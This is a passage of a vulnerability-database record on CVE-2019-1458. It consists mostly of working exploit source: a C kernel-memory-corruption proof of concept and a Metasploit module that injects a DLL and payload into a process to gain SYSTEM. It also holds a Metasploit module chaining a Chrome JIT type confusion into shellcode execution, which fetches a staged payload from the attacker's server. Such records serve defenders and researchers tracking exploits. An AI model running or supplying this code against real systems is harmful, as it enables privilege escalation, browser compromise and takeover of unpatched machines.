\nreturn CheckCode::Safe \nend \n \nfile_path = expand_path('%WINDIR%\\\\system32\\\\win32k.sys') \nmajor, minor, build, revision, branch = file_version(file_path) \nvprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\") \n \nbuild_num_gemversion = Gem::Version.new(\"#{major}.#{minor}.#{build}.#{revision}\") \n \n# Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/ \nif (build_num_gemversion >= Gem::Version.new('6.0.6000.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20692')) # Windows Vista and Windows Server 2008 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24540')) # Windows 7 and Windows Server 2008 R2 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.22932')) # Windows 8 and Windows Server 2012 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19574')) # Windows 8.1 and Windows Server 2012 R2 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18427')) # Windows 10 v1507 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.99999')) # Windows 10 v1511 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3383')) # Windows 10 v1607 \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \ndef exploit \nsuper \n \nif is_system? 
\nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo['Architecture'] != ARCH_X64 \nfail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported') \nend \n \nprocess = setup_process \nlibrary_data = exploit_data('CVE-2019-1458', 'exploit.dll') \nprint_status(\"Injecting exploit into #{process.pid} ...\") \nexploit_mem, offset = inject_dll_data_into_process(process, library_data) \nprint_status(\"Exploit injected. Injecting payload into #{process.pid}...\") \nencoded_payload = payload.encoded \npayload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload) \n \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('Payload injected. Executing exploit...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/159569/cve_2019_1458_wizardopium.rb.txt"}], "exploitdb": [{"lastseen": "2020-03-09T21:37:40", "description": "", "published": "2020-03-03T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - 'WizardOpium' Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-03-03T00:00:00", "id": "EDB-ID:48180", "href": "https://www.exploit-db.com/exploits/48180", "sourceData": "#include <cstdio>\r\n#include <windows.h>\r\n\r\nextern \"C\" NTSTATUS NtUserMessageCall(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii);\r\n\r\nint main() { \r\n HINSTANCE hInstance = GetModuleHandle(NULL);\r\n\r\n WNDCLASSEX wcx;\r\n ZeroMemory(&wcx, sizeof(wcx));\r\n wcx.hInstance = hInstance;\r\n wcx.cbSize = sizeof(wcx);\r\n wcx.lpszClassName = L\"SploitWnd\";\r\n wcx.lpfnWndProc = DefWindowProc;\r\n wcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0\r\n \r\n 
printf(\"[*] Registering window\\n\");\r\n ATOM wndAtom = RegisterClassEx(&wcx);\r\n if (wndAtom == INVALID_ATOM) {\r\n printf(\"[-] Failed registering SploitWnd window class\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Creating instance of this window\\n\");\r\n HWND sploitWnd = CreateWindowEx(0, L\"SploitWnd\", L\"\", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n if (sploitWnd == INVALID_HANDLE_VALUE) {\r\n printf(\"[-] Failed to create SploitWnd window\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window\\n\");\r\n NtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1);\r\n\r\n printf(\"[*] Allocate memory to be used for corruption\\n\");\r\n PVOID mem = VirtualAlloc(0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n printf(\"\\tptr: %p\\n\", mem);\r\n PBYTE byteView = (PBYTE)mem;\r\n byteView[0x6c] = 1; // use GetKeyState in xxxPaintSwitchWindow\r\n\r\n //pass DrawSwitchWndHilite double dereference\r\n PVOID* ulongView = (PVOID*)mem;\r\n ulongView[0x20 / sizeof(PVOID)] = mem;\r\n\r\n printf(\"[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\\n\");\r\n SetWindowLongPtr(sploitWnd, 0, (LONG_PTR)mem);\r\n printf(\"[*] GetLastError = %x\\n\", GetLastError());\r\n\r\n printf(\"[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\\n\");\r\n HWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L\"\", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n\r\n printf(\"[*] Simulating alt key press\\n\");\r\n BYTE keyState[256];\r\n GetKeyboardState(keyState);\r\n keyState[VK_MENU] |= 0x80;\r\n SetKeyboardState(keyState);\r\n\r\n printf(\"[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time\");\r\n NtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1);\r\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48180"}], "metasploit": 
[{"lastseen": "2021-02-25T18:37:04", "description": "This modules exploits a type confusion in Google Chromes JIT compiler. The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary. The payload is executed within the rwx region of the sandboxed renderer process. This module can target the renderer process (target 0), but Google Chrome must be launched with the --no-sandbox flag for the payload to execute successfully. Alternatively, this module can use CVE-2019-1458 to escape the renderer sandbox (target 1). This will only work on vulnerable versions of Windows (e.g Windows 7) and the exploit can only be triggered once. Additionally the exploit can cause the target machine to restart when the session is terminated. A BSOD is also likely to occur when the system is shut down or rebooted.\n", "published": "2020-02-14T22:10:52", "type": "metasploit", "title": "Google Chrome 67, 68 and 69 Object.create exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2021-02-25T14:13:40", "id": "MSF:EXPLOIT/MULTI/BROWSER/CHROME_OBJECT_CREATE/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer\n include Msf::Payload::Windows::AddrLoader_x64\n include Msf::Payload::Windows::ReflectiveDllInject_x64\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit',\n 'Description' => %q{\n This modules exploits a type confusion in Google Chromes JIT compiler.\n The Object.create operation can be used to cause a type confusion between a\n PropertyArray and a NameDictionary.\n The payload is executed within the rwx region of the sandboxed renderer\n process.\n This module can target the 
renderer process (target 0), but Google\n Chrome must be launched with the --no-sandbox flag for the payload to\n execute successfully.\n Alternatively, this module can use CVE-2019-1458 to escape the renderer\n sandbox (target 1). This will only work on vulnerable versions of\n Windows (e.g Windows 7) and the exploit can only be triggered once.\n Additionally the exploit can cause the target machine to restart\n when the session is terminated. A BSOD is also likely to occur when\n the system is shut down or rebooted.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo', # discovery and exploit\n 'timwr', # metasploit module\n ],\n 'References' => [\n ['CVE', '2018-17463'],\n ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],\n ['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => ['windows', 'osx', 'linux'],\n 'DefaultTarget' => 0,\n 'Targets' => [\n [\n 'No sandbox escape (--no-sandbox)', {}\n ],\n [\n 'Windows 7 (x64) sandbox escape via CVE-2019-1458',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'DefaultOptions' => { 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate' }\n }\n ],\n ],\n 'DisclosureDate' => '2018-09-25'\n )\n )\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, 'Show debug information during exploitation', false]),\n ])\n deregister_options('DLL')\n end\n\n def library_path\n File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-1458', 'exploit.dll')\n end\n\n def on_request_uri(cli, request)\n\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\n print_status(\"[*] #{request.body}\")\n send_response(cli, '')\n return\n end\n\n print_status(\"Sending #{request.uri} to 
#{request['User-Agent']}\")\n download_payload = ''\n shellcode = payload.encoded\n uripath = datastore['URIPATH'] || get_resource\n uripath += '/' unless uripath.end_with? '/'\n\n if target.name.end_with?('CVE-2019-1458')\n if request.uri.to_s.end_with?('/payload')\n loader_data = stage_payload\n pidx = loader_data.index('PAYLOAD:')\n if pidx\n loader_data[pidx, payload.encoded.length] = payload.encoded\n end\n loader_data += \"\\0\" * (0x20000 - loader_data.length)\n send_response(cli, loader_data, {\n 'Content-Type' => 'application/octet-stream',\n 'Cache-Control' => 'no-cache, no-store, must-revalidate',\n 'Pragma' => 'no-cache', 'Expires' => '0'\n })\n print_good(\"Sent stage2 exploit (#{loader_data.length.to_s(16)} bytes)\")\n end\n loader = generate_loader\n shellcode = loader[0]\n shellcode_addr_offset = loader[1]\n shellcode_size_offset = loader[2]\n download_payload = <<-JS\n var req = new XMLHttpRequest();\n req.open('GET', '#{uripath}payload', false);\n req.overrideMimeType('text/plain; charset=x-user-defined');\n req.send(null);\n if (req.status != 200) {\n return;\n }\n let payload_size = req.responseText.length;\n let payload_array = new ArrayBuffer(payload_size);\n let payload8 = new Uint8Array(payload_array);\n for (let i = 0; i < req.responseText.length; i++) {\n payload8[i] = req.responseText.charCodeAt(i) & 0xff;\n }\n let payload_array_mem_addr = memory.addrof(payload_array) + 0x20n;\n let payload_array_addr = memory.readPtr(payload_array_mem_addr);\n print('payload addr: 0x' + payload_array_addr.toString(16));\n uint64View[0] = payload_array_addr;\n for (let i = 0; i < 8; i++) {\n shellcode[#{shellcode_addr_offset} + i] = uint8View[i];\n }\n for (let i = 0; i < 4; i++) {\n shellcode[#{shellcode_size_offset} + i] = (payload_size>>(8*i)) & 0xff;\n }\n for (let i = 4; i < 8; i++) {\n shellcode[#{shellcode_size_offset} + i] = 0;\n }\n JS\n end\n\n jscript = <<~JS\n let ab = new ArrayBuffer(8);\n let floatView = new Float64Array(ab);\n let 
uint64View = new BigUint64Array(ab);\n let uint8View = new Uint8Array(ab);\n\n let shellcode = new Uint8Array([#{Rex::Text.to_num(shellcode)}]);\n\n Number.prototype.toBigInt = function toBigInt() {\n floatView[0] = this;\n return uint64View[0];\n };\n\n BigInt.prototype.toNumber = function toNumber() {\n uint64View[0] = this;\n return floatView[0];\n };\n\n function hex(n) {\n return '0x' + n.toString(16);\n };\n\n function fail(s) {\n print('FAIL ' + s);\n throw null;\n }\n\n const NUM_PROPERTIES = 32;\n const MAX_ITERATIONS = 100000;\n\n function gc() {\n for (let i = 0; i < 200; i++) {\n new ArrayBuffer(0x100000);\n }\n }\n\n function make(properties) {\n let o = {inline: 42} // TODO\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n eval(`o.p${i} = properties[${i}];`);\n }\n return o;\n }\n\n function pwn() {\n function find_overlapping_properties() {\n let propertyNames = [];\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n propertyNames[i] = `p${i}`;\n }\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')}\n return [${propertyNames.join(', ')}];\n }\n `);\n\n let propertyValues = [];\n for (let i = 1; i < NUM_PROPERTIES; i++) {\n propertyValues[i] = -i;\n }\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n let r = vuln(make(propertyValues));\n if (r[1] !== -1) {\n for (let i = 1; i < r.length; i++) {\n if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {\n return [i, -r[i]];\n }\n }\n }\n }\n\n fail(\"Failed to find overlapping properties\");\n }\n\n function addrof(obj) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n return o.p${p1}.x1;\n }\n `);\n\n let propertyValues = [];\n propertyValues[p1] = {x1: 13.37, x2: 13.38};\n propertyValues[p2] = {y1: obj};\n\n let i = 0;\n for (; i < MAX_ITERATIONS; i++) {\n let res = vuln(make(propertyValues));\n if (res !== 13.37)\n return res.toBigInt()\n }\n\n fail(\"Addrof failed\");\n }\n\n function 
corrupt_arraybuffer(victim, newValue) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n let orig = o.p${p1}.x2;\n o.p${p1}.x2 = ${newValue.toNumber()};\n return orig;\n }\n `);\n\n let propertyValues = [];\n let o = {x1: 13.37, x2: 13.38};\n propertyValues[p1] = o;\n propertyValues[p2] = victim;\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n o.x2 = 13.38;\n let r = vuln(make(propertyValues));\n if (r !== 13.38)\n return r.toBigInt();\n }\n\n fail(\"Corrupt ArrayBuffer failed\");\n }\n\n let [p1, p2] = find_overlapping_properties();\n print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);\n\n let memview_buf = new ArrayBuffer(1024);\n let driver_buf = new ArrayBuffer(1024);\n\n gc();\n\n let memview_buf_addr = addrof(memview_buf);\n memview_buf_addr--;\n print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);\n\n let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);\n\n let driver = new BigUint64Array(driver_buf);\n let original_memview_buf_ptr = driver[4];\n\n let memory = {\n write(addr, bytes) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n memview.set(bytes);\n },\n read(addr, len) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n return memview.subarray(0, len);\n },\n readPtr(addr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n return memview[0];\n },\n writePtr(addr, ptr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n memview[0] = ptr;\n },\n addrof(obj) {\n memview_buf.leakMe = obj;\n let props = this.readPtr(memview_buf_addr + 8n);\n return this.readPtr(props + 15n) - 1n;\n },\n };\n\n // Generate a RWX region for the payload\n function get_wasm_instance() {\n var buffer = new Uint8Array([\n 0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,\n 1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,\n 
128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,\n 101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11\n ]);\n return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});\n }\n #{download_payload}\n let wasm_instance = get_wasm_instance();\n let wasm_addr = memory.addrof(wasm_instance);\n print(\"wasm_addr @ \" + hex(wasm_addr));\n let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);\n print(\"wasm_rwx @ \" + hex(wasm_rwx_addr));\n\n memory.write(wasm_rwx_addr, shellcode);\n\n let fake_vtab = new ArrayBuffer(0x80);\n let fake_vtab_u64 = new BigUint64Array(fake_vtab);\n let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);\n\n let div = document.createElement('div');\n let div_addr = memory.addrof(div);\n print('div_addr @ ' + hex(div_addr));\n let el_addr = memory.readPtr(div_addr + 0x20n);\n print('el_addr @ ' + hex(el_addr));\n\n fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);\n memory.writePtr(el_addr, fake_vtab_addr);\n\n print('Triggering...');\n\n // Trigger virtual call\n div.dispatchEvent(new Event('click'));\n\n // We are done here, repair the corrupted array buffers\n let addr = memory.addrof(driver_buf);\n memory.writePtr(addr + 32n, original_driver_buf_ptr);\n memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);\n }\n\n pwn();\n JS\n\n if datastore['DEBUG_EXPLOIT']\n debugjs = <<~JS\n print = function(arg) {\n var request = new XMLHttpRequest();\n request.open(\"POST\", \"/print\", false);\n request.send(\"\" + arg);\n };\n JS\n\n jscript = \"#{debugjs}#{jscript}\"\n else\n jscript.gsub!(%r{//.*$}, '') # strip comments\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n\n html = %(\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n)\n send_response(cli, html, {\n 'Content-Type' => 'text/html',\n 'Cache-Control' => 'no-cache, no-store, must-revalidate',\n 'Pragma' => 'no-cache', 'Expires' => '0'\n })\n end\n\nend\n", 
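The module above wires a staged loader to its payload in two places: on the Ruby side, `stage_payload` data has the payload written over a `PAYLOAD:` marker and is NUL-padded to 0x20000 bytes, and on the JavaScript side the payload's address and size are written byte by byte into fixed offsets of the shellcode stub. The following is an added example, not code from the chrome_object_create module, that reproduces both steps standalone with the bounds checks a practitioner would want before shipping a stage. Offsets, sizes and the sample loader bytes are hypothetical; the module takes the real ones from `generate_loader` and the exploit DLL.

```ruby
# Added example; not code from the chrome_object_create module. It reproduces
# the loader plumbing the module performs, with bounds checks: splice the
# payload over a "PAYLOAD:" marker in a loader blob and NUL-pad it to a fixed
# size, then write the payload address and size into a shellcode stub as
# little-endian 64-bit fields. Offsets, sizes and sample bytes are hypothetical.

MARKER = 'PAYLOAD:'.b

# Returns a new binary string: +loader+ with +payload+ written over the bytes
# starting at the marker (overwrite, not insert, as the module does), then
# NUL-padded to +total_size+. Raises instead of silently producing a broken
# stage when the marker is missing or the payload would run past the loader.
def splice_payload(loader, payload, total_size: 0x20000)
  loader = loader.b
  payload = payload.b
  idx = loader.index(MARKER)
  raise ArgumentError, 'PAYLOAD: marker not found in loader' if idx.nil?
  if loader.bytesize > total_size
    raise ArgumentError, format('loader (%#x bytes) exceeds total_size %#x', loader.bytesize, total_size)
  end
  if idx + payload.bytesize > loader.bytesize
    raise ArgumentError, format('payload (%#x bytes) overruns loader at offset %#x', payload.bytesize, idx)
  end
  loader[idx, payload.bytesize] = payload
  loader << ("\0".b * (total_size - loader.bytesize))
end

# Writes the payload address and size into +stub+ at the given offsets as
# 8-byte little-endian fields. Mirrors the JavaScript byte loops in the
# module: the low 32 bits of the size are stored and the high 32 bits zeroed.
def patch_stub(stub, addr_offset:, size_offset:, payload_addr:, payload_size:)
  stub = stub.b
  [addr_offset, size_offset].each do |off|
    raise ArgumentError, format('field at %#x does not fit in stub', off) if off < 0 || off + 8 > stub.bytesize
  end
  stub[addr_offset, 8] = [payload_addr].pack('Q<')
  stub[size_offset, 8] = [payload_size & 0xffff_ffff].pack('Q<')
  stub
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs: a toy loader with the marker in it and an all-zero stub.
  loader = "LOADER\x90\x90PAYLOAD:".b + ("\xCC".b * 64)
  staged = splice_payload(loader, "\xDE\xAD\xBE\xEF".b, total_size: 0x100)
  puts format('staged %#x bytes, payload at offset %#x', staged.bytesize, staged.index("\xDE\xAD".b))
  stub = patch_stub("\0".b * 32, addr_offset: 8, size_offset: 16,
                    payload_addr: 0x00007ffe12345678, payload_size: 0x20000)
  puts stub.unpack1('H*')
end
```

The overrun check is the point of the example: the module overwrites `payload.encoded.length` bytes from the marker onward, so a payload longer than the region the DLL reserved would clobber whatever follows it in the loader, and the failure would only surface in the browser.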
"cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/chrome_object_create.rb"}, {"lastseen": "2021-02-26T20:28:31", "description": "This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability within win32k which occurs due to an uninitialized variable, which allows user-mode attackers to write a limited amount of controlled data to an attacker-controlled address in kernel memory. By utilizing this vulnerability to execute controlled writes to kernel memory, an attacker can gain arbitrary code execution as the SYSTEM user. This module has been tested against Windows 7 x64 SP1. Offsets within the exploit code may need to be adjusted to work with other versions of Windows. The exploit can only be triggered once against the target and can cause the target machine to reboot when the session is terminated.\n", "published": "2020-10-15T15:59:44", "type": "metasploit", "title": "Microsoft Windows Uninitialized Variable Local Privilege Elevation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2019_1458_WIZARDOPIUM/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation',\n 'Description' => %q{\n This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability\n within win32k which occurs due to 
an uninitialized variable, which allows user-mode attackers\n to write a limited amount of controlled data to an attacker-controlled address\n in kernel memory. By utilizing this vulnerability to execute controlled writes\n to kernel memory, an attacker can gain arbitrary code execution\n as the SYSTEM user.\n\n This module has been tested against Windows 7 x64 SP1. Offsets within the\n exploit code may need to be adjusted to work with other versions of Windows.\n The exploit can only be triggered once against the target and can cause the\n target machine to reboot when the session is terminated.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'piotrflorczyk', # poc\n 'unamer', # exploit\n 'timwr', # msf module\n ],\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'Targets' =>\n [\n ['Windows 7 x64', { 'Arch' => ARCH_X64 }]\n ],\n 'Notes' =>\n {\n 'Stability' => [ CRASH_OS_RESTARTS ],\n 'Reliability' => [ UNRELIABLE_SESSION ]\n },\n 'References' =>\n [\n ['CVE', '2019-1458'],\n ['URL', 'https://github.com/unamer/CVE-2019-1458'],\n ['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'],\n ['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'],\n ['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html']\n ],\n 'DisclosureDate' => '2019-12-10',\n 'DefaultTarget' => 0,\n 'AKA' => [ 'WizardOpium' ]\n )\n )\n register_options([\n OptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe'])\n ])\n end\n\n def setup_process\n process_name = datastore['PROCESS']\n begin\n print_status(\"Launching #{process_name} to host the exploit...\")\n launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)\n process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # A sandbox may refuse to create a new process, failing with:\n # 
stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n process\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe\n end\n\n file_path = expand_path('%WINDIR%\\\\system32\\\\win32k.sys')\n major, minor, build, revision, branch = file_version(file_path)\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")\n\n build_num_gemversion = Rex::Version.new(\"#{major}.#{minor}.#{build}.#{revision}\")\n\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/\n if (build_num_gemversion >= Rex::Version.new('6.0.6000.0')) && (build_num_gemversion < Rex::Version.new('6.0.6003.20692')) # Windows Vista and Windows Server 2008\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) && (build_num_gemversion < Rex::Version.new('6.1.7601.24540')) # Windows 7 and Windows Server 2008 R2\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) && (build_num_gemversion < Rex::Version.new('6.2.9200.22932')) # Windows 8 and Windows Server 2012\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) && (build_num_gemversion < Rex::Version.new('6.3.9600.19574')) # Windows 8.1 and Windows Server 2012 R2\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) && (build_num_gemversion < Rex::Version.new('10.0.10240.18427')) # Windows 10 v1507\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) && (build_num_gemversion < Rex::Version.new('10.0.10586.99999')) # Windows 10 v1511\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) && 
(build_num_gemversion < Rex::Version.new('10.0.14393.3383')) # Windows 10 v1607\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] != ARCH_X64\n fail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported')\n end\n\n process = setup_process\n library_data = exploit_data('CVE-2019-1458', 'exploit.dll')\n print_status(\"Injecting exploit into #{process.pid} ...\")\n exploit_mem, offset = inject_dll_data_into_process(process, library_data)\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n encoded_payload = payload.encoded\n payload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2019_1458_wizardopium.rb"}], "zdt": [{"lastseen": "2020-03-09T21:06:08", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2020-03-09T00:00:00", "title": "Microsoft Windows - (WizardOpium) Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-03-09T00:00:00", "id": "1337DAY-ID-34066", "href": "https://0day.today/exploit/description/34066", "sourceData": "#include <cstdio>\r\n#include <windows.h>\r\n\r\nextern \"C\" NTSTATUS NtUserMessageCall(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii);\r\n\r\nint main() { \r\n HINSTANCE hInstance = GetModuleHandle(NULL);\r\n\r\n 
WNDCLASSEX wcx;\r\n ZeroMemory(&wcx, sizeof(wcx));\r\n wcx.hInstance = hInstance;\r\n wcx.cbSize = sizeof(wcx);\r\n wcx.lpszClassName = L\"SploitWnd\";\r\n wcx.lpfnWndProc = DefWindowProc;\r\n wcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0\r\n \r\n printf(\"[*] Registering window\\n\");\r\n ATOM wndAtom = RegisterClassEx(&wcx);\r\n if (wndAtom == INVALID_ATOM) {\r\n printf(\"[-] Failed registering SploitWnd window class\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Creating instance of this window\\n\");\r\n HWND sploitWnd = CreateWindowEx(0, L\"SploitWnd\", L\"\", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n if (sploitWnd == NULL) { // CreateWindowEx returns NULL on failure, not INVALID_HANDLE_VALUE\r\n printf(\"[-] Failed to create SploitWnd window\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window\\n\");\r\n NtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1);\r\n\r\n printf(\"[*] Allocate memory to be used for corruption\\n\");\r\n PVOID mem = VirtualAlloc(0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n if (mem == NULL) {\r\n printf(\"[-] VirtualAlloc failed\\n\");\r\n exit(-1);\r\n }\r\n printf(\"\\tptr: %p\\n\", mem);\r\n PBYTE byteView = (PBYTE)mem;\r\n byteView[0x6c] = 1; // use GetKeyState in xxxPaintSwitchWindow\r\n\r\n //pass DrawSwitchWndHilite double dereference\r\n PVOID* ulongView = 